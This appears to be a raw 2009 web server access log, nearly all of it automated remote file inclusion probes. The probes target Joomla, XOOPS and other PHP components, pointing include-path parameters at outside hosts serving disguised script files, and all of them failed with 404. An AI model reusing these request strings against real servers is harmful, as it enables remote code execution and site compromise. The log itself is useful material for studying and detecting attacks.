74.53.121.130 - - [05/Feb/2009:03:50:52 -0600] "GET /logs/access_log.1212278400/errors.php?error=http://www.charityauction.co.za/includes/idrose.txt???%0D? HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
82.194.72.142 - - [05/Feb/2009:03:53:18 -0600] "GET /logs/access_log.1216080000//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://203.114.112.155/webboard1234/mic.txt? HTTP/1.1" 404 365 "-""libwww-perl/5.803"
82.194.72.142 - - [05/Feb/2009:03:53:19 -0600] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://203.114.112.155/webboard1234/mic.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
82.194.72.142 - - [05/Feb/2009:03:53:19 -0600] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://203.114.112.155/webboard1234/mic.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
82.194.72.142 - - [05/Feb/2009:03:53:57 -0600] "GET /logs/access_log.1212278400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://203.114.112.155/webboard1234/mic.txt? HTTP/1.1" 404 365 "-""libwww-perl/5.803"
67.76.163.60 - - [05/Feb/2009:03:56:44 -0600] "GET //admin/doeditconfig.php?thispath=http://clear.fileave.com/header.jpg? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
200.13.253.154 - - [05/Feb/2009:03:59:31 -0600] "GET /akocomments.php?mosConfig_absolute_path=http://www.dis-daten-it.de/images/bo.do??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
200.13.253.154 - - [05/Feb/2009:03:59:31 -0600] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.dis-daten-it.de/images/bo.do??? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
174.133.209.66 - - [05/Feb/2009:03:59:40 -0600] "GET /logs/access_log.1213660800//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.schlachtbank.net/images/logo.gif?? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
82.194.72.142 - - [05/Feb/2009:03:59:42 -0600] "GET /logs/access_log.1216080000/errors.php?error=http://203.114.112.155/webboard1234/mic.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
82.194.72.142 - - [05/Feb/2009:03:59:42 -0600] "GET /errors.php?error=http://203.114.112.155/webboard1234/mic.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
82.194.72.142 - - [05/Feb/2009:03:59:43 -0600] "GET /logs/errors.php?error=http://203.114.112.155/webboard1234/mic.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
82.194.72.142 - - [05/Feb/2009:04:00:24 -0600] "GET /logs/access_log.1212278400/errors.php?error=http://203.114.112.155/webboard1234/mic.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
91.121.24.179 - - [05/Feb/2009:04:00:30 -0600] "GET /logs/access_log.1213660800//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://imelayu.uni.cc//gif/oye.txt? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
80.25.82.126 - - [05/Feb/2009:04:02:13 -0600] "GET /logs/access_log.1211155200//admin/spaw/spaw_control.class.php?spaw_root=http://canalteresina.org/TT?? HTTP/1.1" 404 345 "-""libwww-perl/5.76"
87.249.116.188 - - [05/Feb/2009:04:03:45 -0600] "GET /logs/access_log.1218758400//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
87.249.116.188 - - [05/Feb/2009:04:03:45 -0600] "GET //path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
87.249.116.188 - - [05/Feb/2009:04:03:45 -0600] "GET /logs//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 343 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
87.249.116.188 - - [05/Feb/2009:04:03:48 -0600] "GET /logs/access_log.1212364800//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
209.126.131.239 - - [05/Feb/2009:04:04:12 -0600] "GET /logs/access_log.1218758400//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b9) Gecko/20050908 Firefox/1.9"
209.126.131.239 - - [05/Feb/2009:04:04:12 -0600] "GET //path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b9) Gecko/20050908 Firefox/1.9"
209.126.131.239 - - [05/Feb/2009:04:04:13 -0600] "GET /logs//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 343 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b9) Gecko/20050908 Firefox/1.9"
209.126.131.239 - - [05/Feb/2009:04:04:17 -0600] "GET /logs/access_log.1212364800//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b9) Gecko/20050908 Firefox/1.9"
80.172.224.171 - - [05/Feb/2009:04:04:41 -0600] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.animeaz.com/mambots/system/telor??? HTTP/1.1" 404 339 "-""libwww-perl/5.810"
80.172.224.171 - - [05/Feb/2009:04:04:41 -0600] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.animeaz.com/mambots/system/telor??? HTTP/1.1" 404 344 "-""libwww-perl/5.810"
80.172.224.171 - - [05/Feb/2009:04:04:41 -0600] "GET /logs/access_log.1214524800//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.animeaz.com/mambots/system/telor??? HTTP/1.1" 404 366 "-""libwww-perl/5.810"
80.172.224.171 - - [05/Feb/2009:04:04:41 -0600] "GET /logs/access_log.1205798400//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.animeaz.com/mambots/system/telor??? HTTP/1.1" 404 366 "-""libwww-perl/5.810"
82.194.72.142 - - [05/Feb/2009:04:04:55 -0600] "GET /logs/access_log.1219017600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://203.114.112.155/webboard1234/mic.txt? HTTP/1.1" 404 349 "-""libwww-perl/5.803"
72.3.139.15 - - [05/Feb/2009:04:05:35 -0600] "GET /logs/access_log.1218758400//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.ural-teplo.ru/tux/idrose.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
72.3.139.15 - - [05/Feb/2009:04:05:35 -0600] "GET //path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.ural-teplo.ru/tux/idrose.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
72.3.139.15 - - [05/Feb/2009:04:05:35 -0600] "GET /logs//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.ural-teplo.ru/tux/idrose.txt??? HTTP/1.1" 404 343 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
72.3.139.15 - - [05/Feb/2009:04:05:43 -0600] "GET /logs/access_log.1212364800//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.ural-teplo.ru/tux/idrose.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
201.120.7.229 - - [05/Feb/2009:04:06:06 -0600] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
201.120.7.229 - - [05/Feb/2009:04:06:06 -0600] "GET /logs/access_log.1218758400/components/com_simpleboard/image_upload.php?sbp=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 354 "-""libwww-perl/5.79"
201.120.7.229 - - [05/Feb/2009:04:06:06 -0600] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 332 "-""libwww-perl/5.79"
80.25.82.126 - - [05/Feb/2009:04:06:30 -0600] "GET /logs/access_log.1218672000//admin/spaw/spaw_control.class.php?spaw_root=http://canalteresina.org/TT?? HTTP/1.1" 404 345 "-""libwww-perl/5.76"
80.25.82.126 - - [05/Feb/2009:04:06:36 -0600] "GET /logs/access_log.1217548800//admin/spaw/spaw_control.class.php?spaw_root=http://canalteresina.org/TT?? HTTP/1.1" 404 345 "-""libwww-perl/5.76"
209.126.131.239 - - [05/Feb/2009:04:07:16 -0600] "GET /logs/access_log.1213142400//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b9) Gecko/20050908 Firefox/1.9"
201.120.7.229 - - [05/Feb/2009:04:07:36 -0600] "GET /logs/access_log.1214179200/components/com_simpleboard/image_upload.php?sbp=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 354 "-""libwww-perl/5.79"
72.3.139.15 - - [05/Feb/2009:04:07:46 -0600] "GET /logs/access_log.1213142400//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.ural-teplo.ru/tux/idrose.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
87.249.116.188 - - [05/Feb/2009:04:07:55 -0600] "GET /logs/access_log.1213142400//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
195.56.77.54 - - [05/Feb/2009:04:07:55 -0600] "GET /logs/access_log.1213747200/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://www.animeaz.com/mambots/system/telor??? HTTP/1.1" 404 360 "-""libwww-perl/5.805"
195.56.77.54 - - [05/Feb/2009:04:07:55 -0600] "GET /components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://www.animeaz.com/mambots/system/telor??? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
195.56.77.54 - - [05/Feb/2009:04:07:55 -0600] "GET /logs/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://www.animeaz.com/mambots/system/telor??? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
195.56.77.54 - - [05/Feb/2009:04:07:56 -0600] "GET /logs/access_log.1213401600/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://www.animeaz.com/mambots/system/telor??? HTTP/1.1" 404 360 "-""libwww-perl/5.805"
77.232.84.2 - - [05/Feb/2009:04:08:06 -0600] "GET /logs//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 343 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
77.232.84.2 - - [05/Feb/2009:04:08:06 -0600] "GET /logs/access_log.1218758400//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
77.232.84.2 - - [05/Feb/2009:04:08:06 -0600] "GET //path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
77.232.84.2 - - [05/Feb/2009:04:08:16 -0600] "GET /logs/access_log.1212364800//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
77.232.84.2 - - [05/Feb/2009:04:08:28 -0600] "GET /logs/access_log.1213142400//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
218.106.254.18 - - [05/Feb/2009:04:08:49 -0600] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
218.106.254.18 - - [05/Feb/2009:04:08:49 -0600] "GET /logs/access_log.1210291200%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
218.106.254.18 - - [05/Feb/2009:04:08:49 -0600] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.106.254.18 - - [05/Feb/2009:04:09:34 -0600] "GET /logs/access_log.1209686400%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
80.172.224.171 - - [05/Feb/2009:04:09:37 -0600] "GET /logs/access_log.1213401600%20//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.animeaz.com/mambots/system/telor??? HTTP/1.1" 404 367 "-""libwww-perl/5.810"
77.232.66.107 - - [05/Feb/2009:04:10:29 -0600] "GET /errors.php?error=http://kangarooislandnature.com/fuzzylime/code/polls/users/idfeelcomz.txt????? HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
77.232.66.107 - - [05/Feb/2009:04:10:29 -0600] "GET /logs/access_log.1218758400/errors.php?error=http://kangarooislandnature.com/fuzzylime/code/polls/users/idfeelcomz.txt????? HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
77.232.66.107 - - [05/Feb/2009:04:10:29 -0600] "GET /logs/errors.php?error=http://kangarooislandnature.com/fuzzylime/code/polls/users/idfeelcomz.txt????? HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
77.232.66.107 - - [05/Feb/2009:04:10:32 -0600] "GET /logs/access_log.1212278400/errors.php?error=http://kangarooislandnature.com/fuzzylime/code/polls/users/idfeelcomz.txt????? HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
72.3.139.15 - - [05/Feb/2009:04:10:47 -0600] "GET /logs/access_log.1214265600//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.ural-teplo.ru/tux/idrose.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
213.189.224.21 - - [05/Feb/2009:04:10:51 -0600] "GET //bemarket/postscript/postscript.php?p_mode=http://pronetec.com/images/.../id2.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
213.189.224.21 - - [05/Feb/2009:04:10:51 -0600] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://pronetec.com/images/.../id2.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
213.189.224.21 - - [05/Feb/2009:04:10:51 -0600] "GET /logs/access_log.1212278400//bemarket/postscript/postscript.php?p_mode=http://pronetec.com/images/.../id2.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
77.232.66.107 - - [05/Feb/2009:04:12:41 -0600] "GET /logs/access_log.1218758400/errors.php?error=http://kangarooislandnature.com/fuzzylime/code/polls/users/idfeelcomz.txt????? HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
77.232.66.107 - - [05/Feb/2009:04:12:41 -0600] "GET /errors.php?error=http://kangarooislandnature.com/fuzzylime/code/polls/users/idfeelcomz.txt????? HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
77.232.66.107 - - [05/Feb/2009:04:12:41 -0600] "GET /logs/errors.php?error=http://kangarooislandnature.com/fuzzylime/code/polls/users/idfeelcomz.txt????? HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
77.232.66.107 - - [05/Feb/2009:04:12:41 -0600] "GET /logs/access_log.1212278400/errors.php?error=http://kangarooislandnature.com/fuzzylime/code/polls/users/idfeelcomz.txt????? HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
116.127.121.39 - - [05/Feb/2009:04:13:31 -0600] "GET /logs/access_log.1216944000//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://h1.ripway.com/b4iano/b4/idv6.txt??? HTTP/1.1" 404 371 "-""libwww-perl/5.79"
116.127.121.39 - - [05/Feb/2009:04:13:31 -0600] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://h1.ripway.com/b4iano/b4/idv6.txt??? HTTP/1.1" 404 349 "-""libwww-perl/5.79"
116.127.121.39 - - [05/Feb/2009:04:13:31 -0600] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://h1.ripway.com/b4iano/b4/idv6.txt??? HTTP/1.1" 404 344 "-""libwww-perl/5.79"
116.127.121.39 - - [05/Feb/2009:04:13:37 -0600] "GET /logs/access_log.1216944000//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://h1.ripway.com/b4iano/b4/idv6.txt??? HTTP/1.1" 404 371 "-""libwww-perl/5.79"
116.127.121.39 - - [05/Feb/2009:04:13:37 -0600] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://h1.ripway.com/b4iano/b4/idv6.txt??? HTTP/1.1" 404 344 "-""libwww-perl/5.79"
116.127.121.39 - - [05/Feb/2009:04:13:37 -0600] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://h1.ripway.com/b4iano/b4/idv6.txt??? HTTP/1.1" 404 349 "-""libwww-perl/5.79"
116.127.121.39 - - [05/Feb/2009:04:13:37 -0600] "GET /logs/access_log.1211328000//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://h1.ripway.com/b4iano/b4/idv6.txt??? HTTP/1.1" 404 371 "-""libwww-perl/5.79"
116.127.121.39 - - [05/Feb/2009:04:13:40 -0600] "GET /logs/access_log.1216944000//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://h1.ripway.com/b4iano/b4/idv6.txt??? HTTP/1.1" 404 371 "-""libwww-perl/5.79"
116.127.121.39 - - [05/Feb/2009:04:13:40 -0600] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://h1.ripway.com/b4iano/b4/idv6.txt??? HTTP/1.1" 404 344 "-""libwww-perl/5.79"
116.127.121.39 - - [05/Feb/2009:04:13:40 -0600] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://h1.ripway.com/b4iano/b4/idv6.txt??? HTTP/1.1" 404 349 "-""libwww-perl/5.79"
116.127.121.39 - - [05/Feb/2009:04:13:40 -0600] "GET /logs/access_log.1211328000//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://h1.ripway.com/b4iano/b4/idv6.txt??? HTTP/1.1" 404 371 "-""libwww-perl/5.79"
116.127.121.39 - - [05/Feb/2009:04:13:41 -0600] "GET /logs/access_log.1211328000//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://h1.ripway.com/b4iano/b4/idv6.txt??? HTTP/1.1" 404 371 "-""libwww-perl/5.79"
72.3.139.15 - - [05/Feb/2009:04:13:41 -0600] "GET /logs/access_log.1214179200//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.ural-teplo.ru/tux/idrose.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
195.56.77.54 - - [05/Feb/2009:04:16:45 -0600] "GET /logs/access_log.1212451200%20/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://www.animeaz.com/mambots/system/telor??? HTTP/1.1" 404 361 "-""libwww-perl/5.805"
91.121.24.179 - - [05/Feb/2009:04:18:49 -0600] "GET /logs/access_log.1213142400//joomla/index.php?option=com_restaurante&task=http://imelayu.uni.cc//gif/oye.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
91.121.24.179 - - [05/Feb/2009:04:18:49 -0600] "GET //joomla/index.php?option=com_restaurante&task=http://imelayu.uni.cc//gif/oye.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
91.121.24.179 - - [05/Feb/2009:04:18:49 -0600] "GET /logs//joomla/index.php?option=com_restaurante&task=http://imelayu.uni.cc//gif/oye.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
174.133.209.66 - - [05/Feb/2009:04:18:53 -0600] "GET /logs/access_log.1213142400//joomla/index.php?option=com_restaurante&task=http://www.schlachtbank.net/images/logo.gif?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
174.133.209.66 - - [05/Feb/2009:04:18:54 -0600] "GET //joomla/index.php?option=com_restaurante&task=http://www.schlachtbank.net/images/logo.gif?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
174.133.209.66 - - [05/Feb/2009:04:18:54 -0600] "GET /logs//joomla/index.php?option=com_restaurante&task=http://www.schlachtbank.net/images/logo.gif?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
91.121.24.179 - - [05/Feb/2009:04:19:08 -0600] "GET /logs/access_log.1212278400//joomla/index.php?option=com_restaurante&task=http://imelayu.uni.cc//gif/oye.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
213.189.224.21 - - [05/Feb/2009:04:19:12 -0600] "GET /logs/access_log.1212278400%20%20//bemarket/postscript/postscript.php?p_mode=http://pronetec.com/images/.../id2.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
174.133.209.66 - - [05/Feb/2009:04:19:14 -0600] "GET /logs/access_log.1212278400//joomla/index.php?option=com_restaurante&task=http://www.schlachtbank.net/images/logo.gif?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
222.100.51.165 - - [05/Feb/2009:04:19:31 -0600] "GET /logs/access_log.1213142400//joomla/index.php?option=com_restaurante&task=http://lostpsychic.com/xoops_data/wing.jpg?? HTTP/1.1" 404 328 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
222.100.51.165 - - [05/Feb/2009:04:19:31 -0600] "GET /logs/access_log.1213142400//joomla/index.php?option=com_restaurante&task=http://lostpsychic.com/xoops_data/wing.jpg?? HTTP/1.1" 404 328 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
222.100.51.165 - - [05/Feb/2009:04:19:31 -0600] "GET //joomla/index.php?option=com_restaurante&task=http://lostpsychic.com/xoops_data/wing.jpg?? HTTP/1.1" 404 301 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
222.100.51.165 - - [05/Feb/2009:04:19:31 -0600] "GET //joomla/index.php?option=com_restaurante&task=http://lostpsychic.com/xoops_data/wing.jpg?? HTTP/1.1" 404 301 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
222.100.51.165 - - [05/Feb/2009:04:19:32 -0600] "GET /logs/access_log.1213142400//joomla/index.php?option=com_restaurante&task=http://www.schlachtbank.net/images/bg.swf?? HTTP/1.1" 404 328 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
222.100.51.165 - - [05/Feb/2009:04:19:37 -0600] "GET //joomla/index.php?option=com_restaurante&task=http://www.schlachtbank.net/images/bg.swf?? HTTP/1.1" 404 301 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
222.100.51.165 - - [05/Feb/2009:04:19:50 -0600] "GET /logs/access_log.1212278400//joomla/index.php?option=com_restaurante&task=http://lostpsychic.com/xoops_data/wing.jpg?? HTTP/1.1" 404 328 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
222.100.51.165 - - [05/Feb/2009:04:19:52 -0600] "GET /logs/access_log.1212278400//joomla/index.php?option=com_restaurante&task=http://lostpsychic.com/xoops_data/wing.jpg?? HTTP/1.1" 404 328 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
222.100.51.165 - - [05/Feb/2009:04:19:57 -0600] "GET /logs/access_log.1212278400//joomla/index.php?option=com_restaurante&task=http://www.schlachtbank.net/images/bg.swf?? HTTP/1.1" 404 328 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
208.111.154.16 - - [05/Feb/2009:04:20:24 -0600] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
208.111.154.16 - - [05/Feb/2009:04:20:24 -0600] "GET /costume/index1.htm HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
202.44.52.78 - - [05/Feb/2009:04:21:21 -0600] "GET /logs/components/com_extcalendar/errors.php?error=http://mailform.lwcs.org//coppermine/albums/readme.txt??%0D?? HTTP/1.1" 404 326 "-""libwww-perl/5.65"
202.44.52.78 - - [05/Feb/2009:04:21:22 -0600] "GET /components/com_extcalendar/errors.php?error=http://mailform.lwcs.org//coppermine/albums/readme.txt??%0D?? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
216.22.26.95 - - [05/Feb/2009:04:21:25 -0600] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 352 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:04:21:25 -0600] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 347 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:04:21:25 -0600] "GET /logs/access_log.1212278400%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 376 "-""Mozilla/5.0"
